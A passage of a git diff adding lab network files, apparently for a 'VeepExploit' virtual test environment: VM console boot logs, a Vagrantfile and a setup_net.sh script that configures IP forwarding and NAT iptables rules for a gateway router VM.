systemd[1]: Listening on Journal Socket. +[ OK ] Listening on Journal Socket. +[ 13.506358] systemd[1]: Mounting Debug File System... + Mounting Debug File System... +[ 13.523222] systemd[1]: Mounting Huge Pages File System... + Mounting Huge Pages File System... +[ 13.547220] systemd[1]: Starting Remount Root and Kernel File Systems... +[ 13.558599] EXT4-fs (sda1): re-mounted. Opts: (null) + Starting Remount Root and Kernel File Systems... +[ 13.615306] systemd[1]: Starting Set console keymap... + Starting Set console keymap... +[ 13.632447] systemd[1]: Starting Load Kernel Modules... + Starting Load Kernel Modules... +[ 13.729798] systemd[1]: Starting Nameserver information manager... + Starting Nameserver inf[ 13.744966] Loading iSCSI transport class v2.0-870. +ormation manager... +[ 13.763486] systemd[1]: Created slice User and Session Slice. +[ OK ] Created slice User and Session Slice. +[ 13.862243] iscsi: registered transport (tcp) +[ 13.867762] systemd[1]: Reached target Slices. +[ OK ] Reached target Slices. +[ 13.907654] systemd[1]: Created slice system-serial\x2dgetty.slice. +[ OK ] Created slice system-serial\x2dgetty.slice. +[ 13.977817] systemd[1]: Reached target Encrypted Volumes. +[ OK ] Reached target Encrypted Volumes. +[ 14.051149] systemd[1]: Starting Create list of required static device nodes for the current kernel... + Starting Create list of required st... nodes for the current kernel... +[ 14.115090] systemd[1]: Reached target Swap. +[ OK ] Reached target Swap. +[ 14.133858] systemd[1]: Listening on Syslog Socket. +[ OK [0[ 14.157665] iscsi: registered transport (iser) +m] Listening on Syslog Socket. +[ 14.202986] systemd[1]: Starting Journal Service... + Starting Journal Service... +[ 14.225610] systemd[1]: Started Trigger resolvconf update for networkd DNS. +[ OK ] Started Trigger resolvconf update for networkd DNS. +[ 14.255671] systemd[1]: Listening on LVM2 metadata daemon socket. +[ OK ] Listening on LVM2 metadata daemon socket. +[ 14.314521] systemd[1]: Starting Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling... + Starting Monitoring of LVM2 mirrors... dmeventd or progress polling... +[ 14.379443] systemd[1]: Starting Uncomplicated firewall... + Starting Uncomplicated firewall... +[ 14.413426] systemd[1]: Mounting POSIX Message Queue File System... + Mounting POSIX Message Queue File System... +[ 14.446697] systemd[1]: Mounted Debug File System. +[ OK ] Mounted Debug File System. +[ 14.492892] systemd[1]: Mounted Huge Pages File System. +[ OK ] Mounted Huge Pages File System. +[ 14.526638] systemd[1]: Mounted POSIX Message Queue File System. +[ OK ] Mounted POSIX Message Queue File System. +[ 14.552947] systemd[1]: Started Journal Service. +[ OK ] Started Journal Service. +[ OK ] Started Remount Root and Kernel File Systems. +[ OK ] Started Set console keymap. +[ OK ] Started Load Kernel Modules. +[ OK ] Started Create list of required sta...ce nodes for the current kernel. +[ OK ] Started Uncomplicated firewall. +[ OK ] Started Nameserver information manager. +[ OK ] Started LVM2 metadata daemon. + Starting Create Static Device Nodes in /dev... + Mounting FUSE Control File System... + Starting Apply Kernel Variables... + Starting Load/Save Random Seed... + Starting udev Coldplug all Devices... + Starting Flush Journal to Persistent Storage... +[ OK ] Mounted FUSE Control File System. +[ OK ] Started Monitoring of LVM2 mirrors,...ng dmeventd or progress polling. +[ OK ] Started Create Static Device Nodes in /dev. +[ OK ] Started Apply Kernel Variables. +[ OK ] Started Load/Save Random Seed. + Starting udev Kernel Device Manager... +[ OK ] Reached target Local File Systems (Pre). +[ OK ] Reached target Local File Systems. + Starting Tell Plymouth To Write Out Runtime Data... + Starting Initial cloud-init job (pre-networking)... + Starting Set console font and keymap... + Starting LSB: AppArmor initialization... +[ OK ] Started udev Kernel Device Manager. +[ OK ] Started Flush Journal to Persistent Storage. +[ OK ] Started udev Coldplug all Devices. +[ OK ] Started Tell Plymouth To Write Out Runtime Data. + Starting Create Volatile Files and Directories... +[ OK ] Started Dispatch Password Requests to Console Directory Watch. +[ OK ] Started Create Volatile Files and Directories. + Starting Update UTMP about System Boot/Shutdown... +[ OK ] Started Update UTMP about System Boot/Shutdown. +[ OK ] Started LSB: AppArmor initialization. +[ OK ] Found device /dev/ttyS0. +[ OK ] Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch. + Starting Load AppArmor profiles managed internally by snapd... +[ OK ] Started Load AppArmor profiles managed internally by snapd. +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Found device 82540EM Gigabit Ethern...r (PRO/1000 MT Desktop Adapter). +[ OK ] Started Set console font and keymap. +[ OK ] Created slice system-getty.slice. +[ 18.632741] cloud-init[467]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init-local' at Mon, 25 Jan 2021 22:38:33 +0000. Up 17.76 seconds. +[ OK ] Started Initial cloud-init job (pre-networking). +[ OK ] Reached target Network (Pre). +[ OK ] Started ifup for enp0s3. + Starting Raise network interfaces... +[ OK ] Started ifup for enp0s8. +[ OK ] Started Raise network interfaces. +[ OK ] Reached target Network. + Starting Initial cloud-init job (metadata service crawler)... +[ 20.210737] cloud-init[1076]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'init' at Mon, 25 Jan 2021 22:38:35 +0000. Up 19.88 seconds. +[ 20.241428] cloud-init[1076]: ci-info: ++++++++++++++++++++++++++++++++++++++Net device info+++++++++++++++++++++++++++++++++++++++ +[ 20.264178] cloud-init[1076]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ +[ 20.278074] [ OK ] Started Initial cloud-init job (metadata service crawler). +[ OK ] Reached target System Initialization. +cloud-init[1076]: ci-info: | Device | Up | Address | Mask | Scope | Hw-Address | +[ 20.306705] Starting Docker Socket for the API. +[ OK ] Started Daily Cleanup of Temporary Directories. +cloud-init[1076]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ +[ 20.330907] Starting LXD - unix socket. +[ OK ] Listening on ACPID Listen Socket. +cloud-init[1076]: ci-info: | enp0s3 | True | 10.0.2.15 | 255.255.255.0 | global | 02:83:3c:85:18:ff | +[ 20.393367] Starting Socket activation for snappy daemon. +cloud-init[1076]: ci-info: | enp0s3 | True | fe80::83:3cff:fe85:18ff/64 | . | link | 02:83:3c:85:18:ff | +[ 20.442043] [ OK ] Started ACPI Events Check. +cloud-init[1076]: ci-info: | enp0s8 | True | 192.168.3.2 | 255.255.255.0 | global | 08:00:27:48:2b:b0 | +[ OK ] Reached target Paths. +[ OK ] Listening on D-Bus System Message Bus Socket. +[ 20.445928] cloud-init[1076]: ci-info: | enp0s8 | True | fe80::a00:27ff:fe48:2bb0/64 | . | link | 08:00:27:48:2b:b0 | +[ 20.567175] cloud-init[1076]: ci-info: | lo | True | 127.0.0.1 | 255.0.0.0 | host | . | +[ OK ] Started Message of the Day. +[ 20.572229] [cloud-init OK [1076]: ] ci-info: | lo | True | ::1/128 | . | host | . |Started Daily apt download activities. + +[ 20.632117] [ OK ] Started Daily apt upgrade and clean activities. +[ OK ] Reached target Timers. +cloud-init[1076]: ci-info: +--------+------+-----------------------------+---------------+--------+-------------------+ +[ 20.712457] [cloud-init OK [1076]: ] ci-info: ++++++++++++++++++++++++++++++Route IPv4 info++++++++++++++++++++++++++++++Listening on UUID daemon activation socket. + +[ 20.794985] [cloud-init OK [1076]: ] ci-info: +-------+-------------+---------------+---------------+-----------+-------+Reached target Network is Online. + +[ 20.795508] cloud-init[1076]: ci-info: | Route | Destination | Gateway | Genmask | Interface | Flags | +[ 20.872674] cloud-init[1076]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ +[ 20.942916] cloud-initStarting iSCSI initiator daemon (iscsid)...[1076]: +ci-info: | 0 | 0.0.0.0 | 10.0.2.2 | 0.0.0.0 | enp0s3 | UG | +[ 21.032697] [cloud-init OK [1076]: ] ci-info: | 1 | 10.0.2.0 | 0.0.0.0 | 255.255.255.0 | enp0s3 | U |Reached target Cloud-config availability. + +[ OK ] Listening on Docker Socket for the API. +[ OK ] Listening on LXD - unix socket. +[ OK ] Listening on Socket activation for snappy daemon. +[ 21.033132] cloud-init[1076]: ci-info: | 2 | 192.168.0.0 | 192.168.3.254 | 255.255.0.0 | enp0s8 | UG | +[ 21.280687] cloud-init[1076]: ci-info: | 3 | 192.168.3.0 | 0.0.0.0 | 255.255.255.0 | enp0s8 | U | +[ 21.303405] cloud-init[1076]: ci-info: +-------+-------------+---------------+---------------+-----------+-------+ +[ 21.369935] cloud-init[1076]: ci-info: +++++++++++++++++++Route IPv6 info+++++++++++++++++++ +[ 21.434472] cloud-init[1076]: ci-info: +-------+-------------+---------+-----------+-------+ +[[ 21.503123] cloud-init[1076]: ci-info: | Route | Destination | Gateway | Interface | Flags | +[ 21.503281] cloud-init[1076]: ci-info: +-------+-------------+---------+-----------+-------+ +[ 21.503568] cloud-init[1076]: ci-info: | 0 | fe80::/64 | :: | enp0s8 | U | +[ 21.503628] cloud-init[1076]: ci-info: | 1 | fe80::/64 | :: | enp0s3 | U | +[ 21.503679] cloud-init[1076]: ci-info: | 5 | ff00::/8 | :: | enp0s8 | U | +[ 21.503892] cloud-init[1076]: ci-info: | 6 | ff00::/8 | :: | enp0s3 | U | +[ 21.503954] cloud-init[1076]: ci-info: +-------+-------------+---------+-----------+-------+ + OK ] Reached target Sockets. +[ OK ] Reached target Basic System. + Starting Virtualbox guest utils... +[ OK ] Started Deferred execution scheduler. + Starting Accounts Service... + Starting /etc/rc.local Compatibility... + Starting Login Service... + Starting LSB: Record successful boot for GRUB... + Starting Snap Daemon... + Starting System Logging Service... + Starting LXD - container startup/shutdown... + Starting containerd container runtime... +[ OK ] Started FUSE filesystem for LXC. + Starting OpenBSD Secure Shell server... +[ OK ] Started D-Bus System Message Bus. + Starting LSB: MD monitoring daemon... +[ OK ] Started ACPI event daemon. +[ OK ] Started Regular background program processing daemon. +[ OK ] Started System Logging Service. +[ OK ] Started iSCSI initiator daemon (iscsid). +[ OK ] Started /etc/rc.local Compatibility. +[ OK ] Started LXD - container startup/shutdown. +[ OK ] Started OpenBSD Secure Shell server. + Starting Authenticate and Authorize Users to Run Privileged Tasks... + Starting Login to default iSCSI targets... +[ OK ] Started Snap Daemon. +[ OK ] Started LSB: Record successful boot for GRUB. +[ OK ] Started LSB: MD monitoring daemon. +[ OK ] Started Login Service. +[ OK ] Started Authenticate and Authorize Users to Run Privileged Tasks. +[ OK ] Started Accounts Service. +[ OK ] Started Unattended Upgrades Shutdown. + Starting Wait until snapd is fully seeded... +[ OK ] Started Virtualbox guest utils. +[ OK ] Started Wait until snapd is fully seeded. + Starting Apply the settings specified in cloud-config... +[ OK ] Started Login to default iSCSI targets. +[ OK ] Reached target Remote File Systems (Pre). +[ OK ] Reached target Remote File Systems. + Starting Permit User Sessions... + Starting LSB: Set the CPU Frequency Scaling governor to "ondemand"... + Starting LSB: daemon to balance interrupts for SMP systems... + Starting LSB: automatic crash report generation... +[ OK ] Started Permit User Sessions. + Starting Hold until boot process finishes up... + Starting Terminate Plymouth Boot Screen... +[ OK ] Started LSB: Set the CPU Frequency Scaling governor to "ondemand". +[ OK ] Started LSB: daemon to balance interrupts for SMP systems. +[ OK ] Started LSB: automatic crash report generation. +[ OK ] Started Hold until boot process finishes up. +[ OK ] Started Terminate Plymouth Boot Screen. +[ OK ] Started containerd container runtime. + Starting Docker Application Container Engine... +[ OK ] Started Serial Getty on ttyS0. +[ OK ] Started Getty on tty1. +[ OK ] Reached target Login Prompts. + Starting Set console scheme... +[ OK ] Started Set console scheme. +[ 25.737831] cloud-init[1297]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:config' at Mon, 25 Jan 2021 22:38:40 +0000. Up 25.42 seconds. +[ OK ] Started Apply the settings specified in cloud-config. +[ OK ] Started Docker Application Container Engine. +[ OK ] Reached target Multi-User System. +[ OK ] Reached target Graphical Interface. + Starting Execute cloud user/final scripts... + Starting Update UTMP about System Runlevel Changes... +[ OK ] Started Update UTMP about System Runlevel Changes. +[ 27.912122] cloud-init[1732]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 running 'modules:final' at Mon, 25 Jan 2021 22:38:43 +0000. Up 27.83 seconds. +[ 27.929181] cloud-init[1732]: Cloud-init v. 20.3-2-g371b392c-0ubuntu1~16.04.1 finished at Mon, 25 Jan 2021 22:38:43 +0000. Datasource DataSourceNoCloud [seed=/dev/sdb][dsmode=net]. Up 27.90 seconds +[ OK ] Started Execute cloud user/final scripts. +[ OK ] Reached target Cloud-init target. + +Ubuntu 16.04.7 LTS vague-web-server ttyS0 + +vague-web-server login: \ No newline at end of file diff --git a/virtual-test-environment/routers/gateway/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/routers/gateway/.vagrant/machines/default/virtualbox/vagrant_cwd new file mode 100644 index 0000000..f224186 --- /dev/null +++ b/virtual-test-environment/routers/gateway/.vagrant/machines/default/virtualbox/vagrant_cwd @@ -0,0 +1 @@ +/home/jive/space/gittin/VeepExploit/virt-lab/routers/gateway \ No newline at end of file diff --git a/virtual-test-environment/routers/gateway/Vagrantfile b/virtual-test-environment/routers/gateway/Vagrantfile new file mode 100644 index 0000000..9b97850 --- /dev/null +++ b/virtual-test-environment/routers/gateway/Vagrantfile @@ -0,0 +1,21 @@ +# -*- mode: ruby -*- + +# vi: set ft=ruby : + +Vagrant.configure(2) do |config| + config.vm.box = "ubuntu/xenial64" + config.vm.hostname = "vague-gateway" + + config.vm.network "forwarded_port", guest: 22, host: 22117, id: 'ssh' + + config.ssh.insert_key = true + config.vm.network "private_network", ip: "192.168.1.2", virtualbox__intnet: "intnet-1" + config.vm.network "private_network", ip: "172.16.4.254", virtualbox__intnet: "intnet-4" + + config.vm.provider "virtualbox" do |vb| + vb.name = "vague-gateway" + end + + config.vm.provision :shell, path: "setup_net.sh" + +end diff --git a/virtual-test-environment/routers/gateway/setup_net.sh b/virtual-test-environment/routers/gateway/setup_net.sh new file mode 100755 index 0000000..cc3f1a5 --- /dev/null +++ b/virtual-test-environment/routers/gateway/setup_net.sh @@ -0,0 +1,54 @@ +#!/bin/bash +# + +OLD_NAME=vague-router +HNAME=gateway + + +apt-get update + +sed -i "s/#VAGRANT-END/up route add -net 192.168.0.0\/16 gw 192.168.1.254 dev enp0s8/g" /etc/network/interfaces + +# Disable rp_filter and enable forwarding for routers +# +echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf + +echo "net.ipv4.conf.all.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.default.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.lo.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s3.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s8.rp_filter=0" >> /etc/sysctl.conf +echo "net.ipv4.conf.enp0s9.rp_filter=0" >> /etc/sysctl.conf + +sysctl -p + +echo iptables-persistent iptables-persistent/autosave_v4 boolean true | sudo debconf-set-selections +echo iptables-persistent iptables-persistent/autosave_v6 boolean true | sudo debconf-set-selections +sudo apt-get install iptables-persistent -y + +echo Flusing any old iptables rules.. + +sudo iptables -F + +sudo iptables --table nat -F + +sudo iptables --delete-chain + +sudo iptables --table nat --delete-chain + +echo Adding forward and masquerade rule for NATing + +sudo iptables -t nat --append POSTROUTING --out-interface enp0s8 -j MASQUERADE + +sudo iptables --append FORWARD --in-interface enp0s9 -j ACCEPT + +echo Saving the current iptables config.. + +sudo netfilter-persistent save + +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hostname +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hosts +hostname $HNAME + + +exit diff --git a/virtual-test-environment/routers/gateway/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/routers/gateway/ubuntu-xenial-16.04-cloudimg-console.log new file mode 100644 index 0000000..346affc --- /dev/null +++ b/virtual-test-environment/routers/gateway/ubuntu-xenial-16.04-cloudimg-console.log @@ -0,0 +1,654 @@ +[ 0.000000] Initializing cgroup subsys cpuset +[ 0.000000] Initializng cgroup subsys cpu +[ 0.000000] Initializing cgroupp subsys cpuacct +[ 0.000000] Linux version 4.4.0-190-generic (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) +[ 0.000000] Command line: BOOT_IME=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] KERNEL supported cpus: +[ 0.000000] Intel GenuineIntel +[ 0.000000] AMD AuthenticAMD +[ 0.000000] Centaur CentaurHauls +[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' +[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format. +[ 0.000000] e820: BIOS-provided physical RAM map: +[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usble +[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved +[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usablle +[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data +[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fff0000-0x00000000ffffffff] reserved +[ 0.000000] NX (Execute Disable) protection: active +[ 0.000000] SMBIOS 2.5 present. +[ 0.000000] Hyprvvisor detected: KVM +[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 +[ 0.000000] MTRR: Disabled +[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. +[ 0.000000] CPU MTRRs all blank - virtualized system. +[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC +[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] +[ 0.000000] Scanning 1 areas for low memory corruption +[ 0.000000] RAMDISK: [mem 0x362e0000-0x37167fff] +[ 0.000000] ACPI: Early table checksum verification disabled +[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) +[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) +[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) +[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) +[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) +[ 0.000000] No NUMA configuration found +[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] +[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] +[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 +[ 0.000000] kvm-clock: cpu 0, msr 0:3fe3001, primary cpu clock +[ 0.000000] kvm-clock: using sched offset of 3638659221 cycles +[ 0.000000]locksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns +[ 0.000000] Zone ranges: +[ 0.000000] DMA [mem 0x0000000000001000-0x0000000000ffffff] +[ 0.000000] DMA32 [mem 0x0000000001000000-0x000000003ffeffff] +[ 0.000000] Normal empty +[ 0.000000] Device empty +[ 0.000000] Movable zone start for each node +[ 0.000000] Early memory node ranges +[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] +[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] +[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] +[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 +[ 0.000000] IOAPIC[0]: apic_id 2, version 32, address 0xfec00000, GSI 0-23 +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) +[ 0.000000] Using ACPI (MADT) for SMP configuration information +[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs +[ 0.000000] M: Registered nosave memory: [mem 0x00000000-0x00000fff] +[ 0.000000] PM: Regstered nosave memory: [mem 0x0009f000-0x0009ffff] +[ 0.00000] PM Registered nosave memory: [mem 0x00a0000-0x000effff] +[ 0.00000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] +[ 0.000000] e820: [mem 0x40000000-0xfebfffff] available for PCI dvices +[ 0.000000] Booting paravirtualized kernel on KVM +[ 0.000000] clocksource: refine-jiffies: mak: 0xffffffff ma_cycles: 0xffffffff, max_idle_ns 7645519600211568 ns +[ 0.000000] setup_percpu: NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ds:2 nr_node_ids:1 +[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 +[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total ages: 257912 +[ 0.000000] Policy zone: DMA32 +[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] PIDhash table entries: 4096 (orer: 3, 32768 bytes) +[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) +[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 +[ 0.00000] Kernel/User page tables isolation: enabled +[ 0.000000 Hierarcical RCU implementation. +[ 0.000000] Build-time adjustment of leaf fanout to 64. +[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. +[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 +[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 +[ 0.00000] Console: colour VGA+ 80x25 +[ 0.000000] console [tty1] enabled +[ 0.000000] console [ttyS0] enabled +[ 0.000000] tsc: Detected 2207.998 MHz processor +[ 1.914660] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) +[ 1.921137] pid_max: default: 32768 minimum: 301 +[ 1.926171] ACPI: Core revision 20150930 +[ 1.931654] ACPI: 2 ACPI AML tables successfully acquired and loaded +[ 1.937371] Security Framework initialized +[ 1.940780] Yama: becoming mindful. +[ 1.944119] AppArmor: AppArmor initialized +[ 1.947376] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) +[ 1.952841] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) +[ 1.959115] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 1.963797] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 1.969677] Initializing cgroup subsys io +[ 1.973469] Initializing cgroup subsys memory +[ 1.978011] Initializing cgroup subsys devices +[ 1.983444] Initializing cgroup subsys freezer +[ 1.986917] Initializing cgroup subsys net_cls +[ 1.989574] Initializing cgroup subsys perf_event +[ 1.992340] Initializing cgroup subsys net_prio +[ 1.996137] Initializing cgroup subsys hugetlb +[ 1.999936] Initializing cgroup subsys pids +[ 2.028076] mce: CPU supports 0 MCE banks +[ 2.031865] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 +[ 2.036505] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 +[ 2.042734] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization +[ 2.046214] Spectre V2 : Mitigation: Full generic retpoline +[ 2.051163] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch +[ 2.056908] Speculative Store Bypass: Vulnerable +[ 2.062103] SRBDS: Unknown: Dependent on hypervisor status +[ 2.068567] MDS: Mitigation: Clear CPU buffers +[ 2.075986] Freeing SMP alternatives memory: 36K +[ 2.091493] ftrace: allocating 32339 entries in 127 pages +[ 2.227560] smpboot: APIC(0) Converting physical 0 to logical package 0 +[ 2.231835] smpboot: Max logical packages: 1 +[ 2.235842] x2apic enabled +[ 2.240228] Switched APIC routing to physical x2apic. +[ 2.247754] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 +[ 2.360138] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) +[ 2.365798] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. +[ 2.392706] KVM setup paravirtual spinlock +[ 2.397876] x86: Booting SMP configuration: +[ 2.401572] .... node #0, CPUs: #1 +[ 2.404865] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock +[ 2.428366] mce: CPU supports 0 MCE banks +[ 2.472757] x86: Booted up 1 node, 2 CPUs +[ 2.475787] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) +[ 2.484688] devtmpfs: initialized +[ 2.503437] evm: security.selinux +[ 2.507617] evm: security.SMACK64 +[ 2.509076] evm: security.SMACK64EXEC +[ 2.509973] evm: security.SMACK64TRANSMUTE +[ 2.513128] evm: security.SMACK64MMAP +[ 2.516856] evm: security.ima +[ 2.518165] evm: security.capability +[ 2.520513] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns +[ 2.524865] futex hash table entries: 512 (order: 3, 32768 bytes) +[ 2.528489] pinctrl core: initialized pinctrl subsystem +[ 2.529962] RTC time: 22:38:14, date: 01/25/21 +[ 2.532920] NET: Registered protocol family 16 +[ 2.546583] cpuidle: using governor ladder +[ 2.558544] cpuidle: using governor menu +[ 2.559572] PCCT header not found. +[ 2.567654] ACPI: bus type PCI registered +[ 2.569937] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 +[ 2.572083] PCI: Using configuration type 1 for base access +[ 2.591002] ACPI: Added _OSI(Module Device) +[ 2.598693] ACPI: Added _OSI(Processor Device) +[ 2.601612] ACPI: Added _OSI(3.0 _SCP Extensions) +[ 2.602774] ACPI: Added _OSI(Processor Aggregator Device) +[ 2.607775] ACPI: Executed 1 blocks of module-level executable AML code +[ 2.619840] ACPI: Interpreter enabled +[ 2.622784] ACPI: (supports S0 S5) +[ 2.637377] ACPI: Using IOAPIC for interrupt routing +[ 2.639412] PCI: Using host bridge windows from ACPI; if necessary, use "pci=nocrs" and report a bug +[ 2.680509] ACPI: PCI Root Bridge [PCI0] (domain 0000 [bus 00-ff]) +[ 2.683927] acpi PNP0A03:00: _OSC: OS supports [ASPM ClockPM Segments MSI] +[ 2.688655] acpi PNP0A03:00: _OSC: not requesting OS control; OS requires [ExtendedConfig ASPM ClockPM MSI] +[ 2.711566] acpi PNP0A03:00: fail to add MMCONFIG information, can't access extended PCI configuration space under this bridge. +[ 2.738439] PCI host bridge to bus 0000:00 +[ 2.741572] pci_bus 0000:00: root bus resource [io 0x0000-0x0cf7 window] +[ 2.746255] pci_bus 0000:00: root bus resource [io 0x0d00-0xffff window] +[ 2.753526] pci_bus 0000:00: root bus resource [mem 0x000a0000-0x000bffff window] +[ 2.759435] pci_bus 0000:00: root bus resource [mem 0x40000000-0xfdffffff window] +[ 2.763940] pci_bus 0000:00: root bus resource [bus 00-ff] +[ 2.779949] pci 0000:00:01.1: legacy IDE quirk: reg 0x10: [io 0x01f0-0x01f7] +[ 2.783499] pci 0000:00:01.1: legacy IDE quirk: reg 0x14: [io 0x03f6] +[ 2.787197] pci 0000:00:01.1: legacy IDE quirk: reg 0x18: [io 0x0170-0x0177] +[ 2.827670] pci 0000:00:01.1: legacy IDE quirk: reg 0x1c: [io 0x0376] +[ 2.872200] pci 0000:00:07.0: quirk: [io 0x4000-0x403f] claimed by PIIX4 ACPI +[ 2.879309] pci 0000:00:07.0: quirk: [io 0x4100-0x410f] claimed by PIIX4 SMB +[ 2.922032] ACPI: PCI Interrupt Link [LNKA] (IRQs 5 9 10 *11) +[ 2.929937] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 9 *10 11) +[ 2.935865] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 *9 10 11) +[ 2.941907] ACPI: PCI Interrupt Link [LNKD] (IRQs 5 9 10 *11) +[ 2.950001] ACPI: Enabled 2 GPEs in block 00 to 07 +[ 2.955324] vgaarb: setting as boot device: PCI:0000:00:02.0 +[ 2.964354] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none +[ 2.976317] vgaarb: loaded +[ 2.979448] vgaarb: bridge control possible 0000:00:02.0 +[ 2.983784] SCSI subsystem initialized +[ 2.987899] ACPI: bus type USB registered +[ 2.995950] usbcore: registered new interface driver usbfs +[ 3.002057] usbcore: registered new interface driver hub +[ 3.007757] usbcore: registered new device driver usb +[ 3.025008] PCI: Using ACPI for IRQ routing +[ 3.027857] NetLabel: Initializing +[ 3.031885] NetLabel: domain hash size = 128 +[ 3.035063] NetLabel: protocols = UNLABELED CIPSOv4 +[ 3.038717] NetLabel: unlabeled 